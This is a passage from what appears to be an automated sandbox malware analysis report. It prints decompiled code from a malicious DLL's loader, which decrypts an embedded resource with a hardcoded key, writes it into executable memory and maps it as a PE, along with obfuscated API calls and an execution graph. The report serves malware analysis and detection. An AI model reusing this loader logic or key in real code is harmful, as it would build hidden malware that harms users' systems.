				_v24 = 0x5faaf9;
				_v20 = 0xab22cd;
				_v12 = 0x8e3542;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x00089943;
				_v8 = 0x9b967a;
				_v8 = _v8 ^ 0x4689732a;
				_v8 = _v8 ^ 0x4619bdd7;
				E0038AA30(0x12d, 0x9df7cc0d, __ecx, 0xf5e9dd1e);
				_t25 = LoadLibraryW(_a8); // executed
				return _t25;
			}










                                                                                                                                                            0x00385c03
                                                                                                                                                            0x00385c06
                                                                                                                                                            0x00385c0a
                                                                                                                                                            0x00385c0b
                                                                                                                                                            0x00385c10
                                                                                                                                                            0x00385c17
                                                                                                                                                            0x00385c23
                                                                                                                                                            0x00385c2a
                                                                                                                                                            0x00385c31
                                                                                                                                                            0x00385c35
                                                                                                                                                            0x00385c3c
                                                                                                                                                            0x00385c43
                                                                                                                                                            0x00385c4a
                                                                                                                                                            0x00385c62
                                                                                                                                                            0x00385c6d
                                                                                                                                                            0x00385c72

                                                                                                                                                            APIs
                                                                                                                                                            • LoadLibraryW.KERNEL32(00000000), ref: 00385C6D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                                                            • Instruction ID: 882e3058d24d91c190da8d708d6e3ff7a7826cb75016cae2eca5712e9998a69d
                                                                                                                                                            • Opcode Fuzzy Hash: e382c7baeaf3a69a46a4a7878245b3f76dac83df27b8d9f7b041c7ed08bbac4f
                                                                                                                                                            • Instruction Fuzzy Hash: 50F0FFB5C0020CFBCF05EFE4DA46AEEBBB4FB40318F108188E91566212D3B54B58DB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037B23C Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E0037B23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				int _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t27);
				_v12 = 0x6268;
				_v12 = _v12 ^ 0x57e834c3;
				_v12 = _v12 + 0xffff2919;
				_v12 = _v12 + 0xffff3e3d;
				_v12 = _v12 ^ 0x57e9dc2b;
				_v8 = 0xa46433;
				_v8 = _v8 + 0x98ba;
				_v8 = _v8 | 0xc390ebe9;
				_v8 = _v8 + 0xd5b0;
				_v8 = _v8 ^ 0xc3bab866;
				E0038AA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
				_t32 = lstrcmpiW(_a16, _a4); // executed
				return _t32;
			}







                                                                                                                                                            0x0037b23f
                                                                                                                                                            0x0037b240
                                                                                                                                                            0x0037b241
                                                                                                                                                            0x0037b244
                                                                                                                                                            0x0037b247
                                                                                                                                                            0x0037b24a
                                                                                                                                                            0x0037b24e
                                                                                                                                                            0x0037b24f
                                                                                                                                                            0x0037b254
                                                                                                                                                            0x0037b25e
                                                                                                                                                            0x0037b26a
                                                                                                                                                            0x0037b271
                                                                                                                                                            0x0037b278
                                                                                                                                                            0x0037b27f
                                                                                                                                                            0x0037b286
                                                                                                                                                            0x0037b28d
                                                                                                                                                            0x0037b294
                                                                                                                                                            0x0037b29b
                                                                                                                                                            0x0037b2b3
                                                                                                                                                            0x0037b2c1
                                                                                                                                                            0x0037b2c6

                                                                                                                                                            APIs
                                                                                                                                                            • lstrcmpiW.KERNEL32(EE1E6DE5,57E9DC2B), ref: 0037B2C1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: lstrcmpi
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1586166983-0
                                                                                                                                                            • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                                            • Instruction ID: 990d1e94676dfe5714b5f3eca96472de2481dd2d6cd9bb128b4d258173c82d31
                                                                                                                                                            • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                                            • Instruction Fuzzy Hash: DC011AB2C04708FFDF45DFD4DD468AEBB75EB44304F108189B90566152E3754B609B51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00381E67 Relevance: 1.3, APIs: 1, Instructions: 34COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                            			E00381E67(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t23;
				int _t29;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t23);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x62b4e9;
				_v20 = 0xc383c4;
				_v12 = 0x238243;
				_v12 = _v12 * 0x67;
				_v12 = _v12 ^ 0x0e4d658b;
				_v8 = 0x6564d0;
				_v8 = _v8 ^ 0x2b193590;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x8a2acb03;
				E0038AA30(0x23f, 0x9df7cc0d, __ecx, 0x3185251c);
				_t29 = CloseHandle(_a12); // executed
				return _t29;
			}










                                                                                                                                                            0x00381e6d
                                                                                                                                                            0x00381e70
                                                                                                                                                            0x00381e73
                                                                                                                                                            0x00381e77
                                                                                                                                                            0x00381e78
                                                                                                                                                            0x00381e7d
                                                                                                                                                            0x00381e84
                                                                                                                                                            0x00381e90
                                                                                                                                                            0x00381e97
                                                                                                                                                            0x00381ead
                                                                                                                                                            0x00381eb0
                                                                                                                                                            0x00381eb7
                                                                                                                                                            0x00381ebe
                                                                                                                                                            0x00381ec5
                                                                                                                                                            0x00381ec9
                                                                                                                                                            0x00381ed6
                                                                                                                                                            0x00381ee1
                                                                                                                                                            0x00381ee6

                                                                                                                                                            APIs
                                                                                                                                                            • CloseHandle.KERNEL32(00C383C4), ref: 00381EE1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                            • Opcode ID: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                                                            • Instruction ID: 21b655460f63d0f9eb26e416a72bd96848b0849aad2e13ef303cb57284890a36
                                                                                                                                                            • Opcode Fuzzy Hash: c4708a402737a47667ccad7e6bda5106f8ba5e7004358f80371dbad68f71623e
                                                                                                                                                            • Instruction Fuzzy Hash: 490128B5C00208FBCF40EFE4D94A99EBFB5EB44308F108499E81567212D7758B14DF91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:16.1%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                            Total number of Nodes:297
                                                                                                                                                            Total number of Limit Nodes:23
                                                                                                                                                            execution_graph 31847 10035042 TlsGetValue 31848 10035076 GetModuleHandleA 31847->31848 31849 10035055 31847->31849 31851 10035085 GetProcAddress 31848->31851 31852 1003509f 31848->31852 31849->31848 31850 1003505f TlsGetValue 31849->31850 31855 1003506a 31850->31855 31853 1003506e 31851->31853 31853->31852 31854 10035095 RtlEncodePointer 31853->31854 31854->31852 31855->31848 31855->31853 31856 10020c26 31859 10020c32 __EH_prolog3 31856->31859 31858 10020c80 31883 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31858->31883 31859->31858 31867 1002083b EnterCriticalSection 31859->31867 31881 100201f1 RaiseException __CxxThrowException@8 31859->31881 31882 1002094b TlsAlloc InitializeCriticalSection 31859->31882 31861 10020c8d 31864 10020c93 31861->31864 31865 10020ca6 ~_Task_impl 31861->31865 31884 100209ed 88 API calls 4 library calls 31864->31884 31868 1002085a 31867->31868 31869 10020916 _memset 31868->31869 31871 10020893 31868->31871 31872 100208a8 GlobalHandle GlobalUnlock 31868->31872 31870 1002092a LeaveCriticalSection 31869->31870 31870->31859 31885 10014460 31871->31885 31874 10014460 ctype 80 API calls 31872->31874 31876 100208c5 GlobalReAlloc 31874->31876 31877 100208cf 31876->31877 31878 100208f7 GlobalLock 31877->31878 31879 100208da GlobalHandle GlobalLock 31877->31879 31880 100208e8 LeaveCriticalSection 31877->31880 31878->31869 31879->31880 31880->31878 31882->31859 31883->31861 31884->31865 31886 10014477 ctype 31885->31886 31887 1001448c GlobalAlloc 31886->31887 31889 10013ba0 80 API calls ctype 31886->31889 31887->31877 31889->31887 31890 10030d06 31891 10030d12 31890->31891 31892 10030d0d 31890->31892 31896 10030c10 31891->31896 31908 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31892->31908 31895 10030d23 31898 10030c1c __mtinitlocknum 31896->31898 31897 10030c69 31899 10030cb9 __mtinitlocknum 31897->31899 31963 100125c0 31897->31963 31898->31897 31898->31899 31909 10030a37 31898->31909 31899->31895 31902 10030c99 31902->31899 31904 10030a37 __CRT_INIT@12 165 API calls 31902->31904 31904->31899 31905 100125c0 ___DllMainCRTStartup 146 API calls 31906 10030c90 31905->31906 31907 10030a37 __CRT_INIT@12 165 API calls 31906->31907 31907->31902 31908->31891 31910 10030b61 31909->31910 31911 10030a4a GetProcessHeap HeapAlloc 31909->31911 31913 10030b67 31910->31913 31914 10030b9c 31910->31914 31912 10030a6e GetVersionExA 31911->31912 31927 10030a67 31911->31927 31915 10030a89 GetProcessHeap HeapFree 31912->31915 31916 10030a7e GetProcessHeap HeapFree 31912->31916 31921 10030b86 31913->31921 31913->31927 32011 100310be 67 API calls _doexit 31913->32011 31917 10030ba1 31914->31917 31918 10030bfa 31914->31918 31919 10030ab5 31915->31919 31916->31927 31995 10035135 6 API calls __decode_pointer 31917->31995 31918->31927 32030 10035425 79 API calls 2 library calls 31918->32030 31985 10036624 HeapCreate 31919->31985 31921->31927 32012 100389ee 68 API calls __mtinitlocknum 31921->32012 31922 10030ba6 31996 10035840 31922->31996 31927->31897 31928 10030aeb 31928->31927 31931 10030af4 31928->31931 32002 1003548e 78 API calls 7 library calls 31931->32002 31932 10030b90 32013 10035178 70 API calls 2 library calls 31932->32013 31934 10030bbe 32015 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31934->32015 31936 10030b95 32014 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31936->32014 31938 10030af9 __RTC_Initialize 31941 10030b0c GetCommandLineA 31938->31941 31955 10030afd 31938->31955 32004 10038d66 77 API calls 3 library calls 31941->32004 31942 10030bd0 31944 10030bd7 31942->31944 31945 10030bee 31942->31945 32016 100351b5 67 API calls 4 library calls 31944->32016 32017 1002fa69 31945->32017 31948 10030b1c 32005 100387ae 72 API calls 3 library calls 31948->32005 31949 10030bde GetCurrentThreadId 31949->31927 31951 10030b26 31952 10030b2a 31951->31952 32007 10038cad 111 API calls 3 library calls 31951->32007 32006 10035178 70 API calls 2 library calls 31952->32006 32003 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31955->32003 31956 10030b36 31957 10030b4a 31956->31957 32008 10038a3a 110 API calls 6 library calls 31956->32008 31962 10030b02 31957->31962 32010 100389ee 68 API calls __mtinitlocknum 31957->32010 31960 10030b3f 31960->31957 32009 10030f4d 75 API calls 4 library calls 31960->32009 31962->31927 32056 10006a90 31963->32056 31966 1001265a 32090 1002fe65 105 API calls 6 library calls 31966->32090 31967 1001261c FindResourceW LoadResource SizeofResource 31970 10006a90 ___DllMainCRTStartup 67 API calls 31967->31970 31973 10012744 ___DllMainCRTStartup 31970->31973 31972 1001284d 31972->31902 31972->31905 31974 100127b7 VirtualAlloc 31973->31974 31975 1001279b VirtualAllocExNuma 31973->31975 31976 100127da 31974->31976 31975->31976 32061 1002fb00 31976->32061 31980 100127fa 32084 10002970 31980->32084 31982 10012810 ___DllMainCRTStartup 32087 100026a0 31982->32087 31984 10012664 32091 1002f81e 5 API calls __invoke_watson 31984->32091 31986 10036647 31985->31986 31987 10036644 31985->31987 32031 100365c9 67 API calls 3 library calls 31986->32031 31987->31928 31989 1003664c 31990 10036656 31989->31990 31991 1003667a 31989->31991 32032 10035aca HeapAlloc 31990->32032 31991->31928 31993 10036660 31993->31991 31994 10036665 HeapDestroy 31993->31994 31994->31987 31995->31922 31997 10035844 31996->31997 31999 10030bb2 31997->31999 32000 10035864 Sleep 31997->32000 32033 10030678 31997->32033 31999->31927 31999->31934 32001 10035879 32000->32001 32001->31997 32001->31999 32002->31938 32003->31962 32004->31948 32005->31951 32006->31955 32007->31956 32008->31960 32009->31957 32010->31952 32011->31921 32012->31932 32013->31936 32014->31927 32015->31942 32016->31949 32019 1002fa75 __mtinitlocknum 32017->32019 32018 1002faee __expand __mtinitlocknum 32018->31962 32019->32018 32020 1002fab4 32019->32020 32052 10035a99 67 API calls 2 library calls 32019->32052 32020->32018 32021 1002fac9 HeapFree 32020->32021 32021->32018 32023 1002fadb 32021->32023 32055 100311f4 67 API calls __getptd_noexit 32023->32055 32025 1002fae0 GetLastError 32025->32018 32026 1002faa6 32054 1002fabf LeaveCriticalSection _doexit 32026->32054 32027 1002fa8c ___sbh_find_block 32027->32026 32053 10035b3d VirtualFree VirtualFree HeapFree __cftoe2_l 32027->32053 32030->31927 32031->31989 32032->31993 32034 10030684 __mtinitlocknum 32033->32034 32035 1003069c 32034->32035 32045 100306bb _memset 32034->32045 32046 100311f4 67 API calls __getptd_noexit 32035->32046 32037 100306a1 32047 10037753 4 API calls 2 library calls 32037->32047 32039 1003072d RtlAllocateHeap 32039->32045 32042 100306b1 __mtinitlocknum 32042->31997 32045->32039 32045->32042 32048 10035a99 67 API calls 2 library calls 32045->32048 32049 100362e6 5 API calls 2 library calls 32045->32049 32050 10030774 LeaveCriticalSection _doexit 32045->32050 32051 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32045->32051 32046->32037 32048->32045 32049->32045 32050->32045 32051->32045 32052->32027 32053->32026 32054->32020 32055->32025 32057 1002f9a6 _malloc 67 API calls 32056->32057 32058 10006aa1 32057->32058 32059 1002fa69 __mtinitlocknum 67 API calls 32058->32059 32060 10006aad 32058->32060 32059->32060 32060->31966 32060->31967 32062 1002fb18 32061->32062 32063 1002fb3f __VEC_memcpy 32062->32063 32064 100127eb 32062->32064 32063->32064 32065 1002f9a6 32064->32065 32066 1002fa53 32065->32066 32077 1002f9b4 32065->32077 32099 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32066->32099 32068 1002fa59 32100 100311f4 67 API calls __getptd_noexit 32068->32100 32071 1002fa5f 32071->31980 32074 1002fa17 RtlAllocateHeap 32074->32077 32075 1002f9c9 32075->32077 32092 10036892 67 API calls 2 library calls 32075->32092 32093 100366f2 67 API calls 7 library calls 32075->32093 32094 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32075->32094 32077->32074 32077->32075 32078 1002fa4a 32077->32078 32079 1002fa3e 32077->32079 32082 1002fa3c 32077->32082 32095 1002f957 67 API calls 4 library calls 32077->32095 32096 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32077->32096 32078->31980 32097 100311f4 67 API calls __getptd_noexit 32079->32097 32098 100311f4 67 API calls __getptd_noexit 32082->32098 32085 1002f9a6 _malloc 67 API calls 32084->32085 32086 10002990 32085->32086 32086->31982 32101 10002280 32087->32101 32090->31984 32091->31972 32092->32075 32093->32075 32095->32077 32096->32077 32097->32082 32098->32078 32099->32068 32100->32071 32138 10001990 32101->32138 32104 100022c3 SetLastError 32135 100022a9 32104->32135 32105 100022d5 32106 10001990 ___DllMainCRTStartup SetLastError 32105->32106 32107 100022ee 32106->32107 32108 10002310 SetLastError 32107->32108 32109 10002322 32107->32109 32107->32135 32108->32135 32110 10002331 SetLastError 32109->32110 32111 10002343 32109->32111 32110->32135 32112 1000234e SetLastError 32111->32112 32114 10002360 GetNativeSystemInfo 32111->32114 32112->32135 32115 10002414 SetLastError 32114->32115 32116 10002426 VirtualAlloc 32114->32116 32115->32135 32117 10002472 GetProcessHeap HeapAlloc 32116->32117 32118 10002447 VirtualAlloc 32116->32118 32120 100024ac 32117->32120 32121 1000248c VirtualFree SetLastError 32117->32121 32118->32117 32119 10002463 SetLastError 32118->32119 32119->32135 32122 10001990 ___DllMainCRTStartup SetLastError 32120->32122 32121->32135 32123 1000250e 32122->32123 32124 10002512 32123->32124 32125 1000251c VirtualAlloc 32123->32125 32176 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32124->32176 32126 1000254b ___DllMainCRTStartup 32125->32126 32141 100019c0 32126->32141 32129 1000257f ___DllMainCRTStartup 32129->32124 32151 10001ff0 32129->32151 32133 100025e8 ___DllMainCRTStartup 32133->32124 32133->32135 32170 27e991 32133->32170 32135->31984 32136 1000264f SetLastError 32136->32124 32139 100019ab 32138->32139 32140 1000199f SetLastError 32138->32140 32139->32104 32139->32105 32139->32135 32140->32139 32142 100019f0 32141->32142 32143 10001a83 32142->32143 32145 10001a2c VirtualAlloc 32142->32145 32150 10001aa0 ___DllMainCRTStartup 32142->32150 32144 10001990 ___DllMainCRTStartup SetLastError 32143->32144 32146 10001a9c 32144->32146 32147 10001a50 32145->32147 32148 10001a57 ___DllMainCRTStartup 32145->32148 32149 10001aa4 VirtualAlloc 32146->32149 32146->32150 32147->32150 32148->32142 32149->32150 32150->32129 32152 10002029 IsBadReadPtr 32151->32152 32161 1000201f 32151->32161 32154 10002053 32152->32154 32152->32161 32155 10002085 SetLastError 32154->32155 32156 10002099 32154->32156 32154->32161 32155->32161 32177 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32156->32177 32158 100020b3 32159 100020bf SetLastError 32158->32159 32163 100020e9 32158->32163 32159->32161 32161->32124 32164 10001cb0 32161->32164 32162 100021f9 SetLastError 32162->32161 32163->32161 32163->32162 32165 10001cf8 ___DllMainCRTStartup 32164->32165 32166 10001e01 32165->32166 32168 10001ddd 32165->32168 32178 10001b80 32165->32178 32167 10001b80 ___DllMainCRTStartup 2 API calls 32166->32167 32167->32168 32168->32133 32171 27ea62 32170->32171 32172 27ea8d 32170->32172 32185 27f8fd 32171->32185 32172->32135 32172->32136 32176->32135 32177->32158 32179 10001b9c 32178->32179 32181 10001b92 32178->32181 32180 10001baa 32179->32180 32183 10001c04 VirtualProtect 32179->32183 32180->32181 32184 10001be2 VirtualFree 32180->32184 32181->32165 32183->32181 32184->32181 32195 27fde0 32185->32195 32186 27ffd1 32209 27ab87 32186->32209 32189 27ea75 32189->32172 32198 2793ed 32189->32198 32192 28dcf7 GetPEB 32192->32195 32195->32186 32195->32189 32195->32192 32196 27a8b0 GetPEB 32195->32196 32201 27b23c 32195->32201 32205 2846bb 32195->32205 32219 28da22 GetPEB 32195->32219 32220 2747ce GetPEB 32195->32220 32221 27f899 GetPEB 32195->32221 32222 274b61 32195->32222 32196->32195 32199 28aa30 GetPEB 32198->32199 32200 279456 ExitProcess 32199->32200 32200->32172 32202 27b254 32201->32202 32226 28aa30 32202->32226 32206 2846da 32205->32206 32207 28aa30 GetPEB 32206->32207 32208 284729 SHGetFolderPathW 32207->32208 32208->32195 32210 27abb0 32209->32210 32211 274b61 GetPEB 32210->32211 32212 27ad67 32211->32212 32234 277f5d 32212->32234 32214 27ada4 32214->32189 32215 27ad99 32215->32214 32238 281e67 GetPEB 32215->32238 32217 27adc4 32239 281e67 GetPEB 32217->32239 32219->32195 32220->32195 32221->32195 32223 274b74 32222->32223 32240 271ea7 32223->32240 32227 28ab1d 32226->32227 32231 27b2b8 lstrcmpiW 32226->32231 32232 280a0e GetPEB 32227->32232 32229 28ab33 32233 27cdcd GetPEB 32229->32233 32231->32195 32232->32229 32233->32231 32235 277f8e 32234->32235 32236 28aa30 GetPEB 32235->32236 32237 277fd4 CreateProcessW 32236->32237 32237->32215 32238->32217 32239->32214 32241 271ebc 32240->32241 32244 27702c 32241->32244 32245 277049 32244->32245 32246 28aa30 GetPEB 32245->32246 32247 271f4c 32246->32247 32247->32195

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				char _v40;
				void* _v44;
				void* _v48;
				long _v52;
				void* _v56;
				struct HRSRC__* _v60;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				char _v88;
				intOrPtr _v92;
				void* __ebp;
				signed int _t66;
				void* _t70;
				void* _t72;
				struct HRSRC__* _t74;
				void* _t78;
				intOrPtr _t92;
				void* _t93;
				void* _t95;
				intOrPtr _t104;
				signed int _t120;
				void* _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t96 = __ebx;
				_t66 =  *0x100545cc; // 0xd853c527
				_v20 = _t66 ^ _t120;
				_v92 = _a8;
				 *0x10055a80 = _a4;
				_t109 = _a8;
				 *0x10055a84 = _a8;
				 *0x10055a88 = _a12;
				_v8 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v12 = 0;
				_t70 = E10006A90(__eflags); // executed
				_t131 = _t70;
				if(_t70 != 0) {
					_push(0x10046758);
					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
					_t72 = 0;
				} else {
					 *0x100530b8 = 0;
					 *0x100530bc = 0;
					 *0x100530c0 = 0;
					 *0x100530c8 = 0;
					 *0x100530c4 = 0;
					 *0x100530cc = 0;
					_v60 = 0;
					_v56 = 0;
					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
					_v60 = _t74;
					_v56 = LoadResource(_a4, _v60);
					_v52 = SizeofResource(_a4, _v60);
					_v88 = 0x6b;
					_v86 = 0x65;
					_v84 = 0x72;
					_v82 = 0x6e;
					_v80 = 0x65;
					_v78 = 0x6c;
					_v76 = 0x33;
					_v74 = 0x32;
					_v72 = 0x2e;
					_v70 = 0x64;
					_v68 = 0x6c;
					_v66 = 0x6c;
					_v64 = 0;
					_v40 = 0x6e;
					_v38 = 0x74;
					_v36 = 0x64;
					_v34 = 0x6c;
					_v32 = 0x6c;
					_v30 = 0x2e;
					_v28 = 0x64;
					_v26 = 0x6c;
					_v24 = 0x6c;
					_v22 = 0;
					_t78 = E10006A90(_t131); // executed
					if(_t78 == 0) {
						_t45 =  &_v88; // 0x6b
						_t95 = E100048E0(_t45);
						_t121 = _t121 + 4;
						_v44 = _t95;
					}
					_t47 =  &_v40; // 0x6e
					_v48 = E100048E0(_t47);
					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
					_t133 =  *0x10055a78;
					if( *0x10055a78 == 0) {
						__eflags = 0x2000;
						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
					} else {
						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
						_v12 = _t93;
					}
					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
					_t104 =  *0x100530b4; // 0x2795
					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
					_t109 = _v16;
					E10003EE0(_v16, _v12, _v52);
					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
					 *0x10055a8c = _t92;
					_t72 = 1;
				}
				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
			}
















































                                                                                                                                                            0x100125c0
                                                                                                                                                            0x100125c0
                                                                                                                                                            0x100125c0
                                                                                                                                                            0x100125c6
                                                                                                                                                            0x100125cd
                                                                                                                                                            0x100125d3
                                                                                                                                                            0x100125d9
                                                                                                                                                            0x100125df
                                                                                                                                                            0x100125e2
                                                                                                                                                            0x100125eb
                                                                                                                                                            0x100125f0
                                                                                                                                                            0x100125f7
                                                                                                                                                            0x100125fe
                                                                                                                                                            0x10012605
                                                                                                                                                            0x1001260c
                                                                                                                                                            0x10012613
                                                                                                                                                            0x10012618
                                                                                                                                                            0x1001261a
                                                                                                                                                            0x1001265a
                                                                                                                                                            0x1001265f
                                                                                                                                                            0x10012667
                                                                                                                                                            0x1001261c
                                                                                                                                                            0x1001261c
                                                                                                                                                            0x10012626
                                                                                                                                                            0x10012630
                                                                                                                                                            0x1001263a
                                                                                                                                                            0x10012644
                                                                                                                                                            0x1001264e
                                                                                                                                                            0x1001266e
                                                                                                                                                            0x10012675
                                                                                                                                                            0x1001268a
                                                                                                                                                            0x10012690
                                                                                                                                                            0x100126a1
                                                                                                                                                            0x100126b2
                                                                                                                                                            0x100126b5
                                                                                                                                                            0x100126bb
                                                                                                                                                            0x100126c1
                                                                                                                                                            0x100126c7
                                                                                                                                                            0x100126cd
                                                                                                                                                            0x100126d3
                                                                                                                                                            0x100126d9
                                                                                                                                                            0x100126df
                                                                                                                                                            0x100126e5
                                                                                                                                                            0x100126eb
                                                                                                                                                            0x100126f1
                                                                                                                                                            0x100126f7
                                                                                                                                                            0x100126fd
                                                                                                                                                            0x10012703
                                                                                                                                                            0x10012709
                                                                                                                                                            0x1001270f
                                                                                                                                                            0x10012715
                                                                                                                                                            0x1001271b
                                                                                                                                                            0x10012721
                                                                                                                                                            0x10012727
                                                                                                                                                            0x1001272d
                                                                                                                                                            0x10012733
                                                                                                                                                            0x10012739
                                                                                                                                                            0x1001273f
                                                                                                                                                            0x10012746
                                                                                                                                                            0x10012748
                                                                                                                                                            0x1001274c
                                                                                                                                                            0x10012751
                                                                                                                                                            0x10012754
                                                                                                                                                            0x10012754
                                                                                                                                                            0x10012757
                                                                                                                                                            0x10012763
                                                                                                                                                            0x10012777
                                                                                                                                                            0x1001278d
                                                                                                                                                            0x10012792
                                                                                                                                                            0x10012799
                                                                                                                                                            0x100127c4
                                                                                                                                                            0x100127d7
                                                                                                                                                            0x1001279b
                                                                                                                                                            0x100127ac
                                                                                                                                                            0x100127b2
                                                                                                                                                            0x100127b2
                                                                                                                                                            0x100127e6
                                                                                                                                                            0x100127ee
                                                                                                                                                            0x100127fd
                                                                                                                                                            0x1001280b
                                                                                                                                                            0x1001281b
                                                                                                                                                            0x1001281f
                                                                                                                                                            0x10012834
                                                                                                                                                            0x10012839
                                                                                                                                                            0x1001283e
                                                                                                                                                            0x1001283e
                                                                                                                                                            0x10012850

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                                                            • _printf.LIBCMT ref: 1001265F
                                                                                                                                                            • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
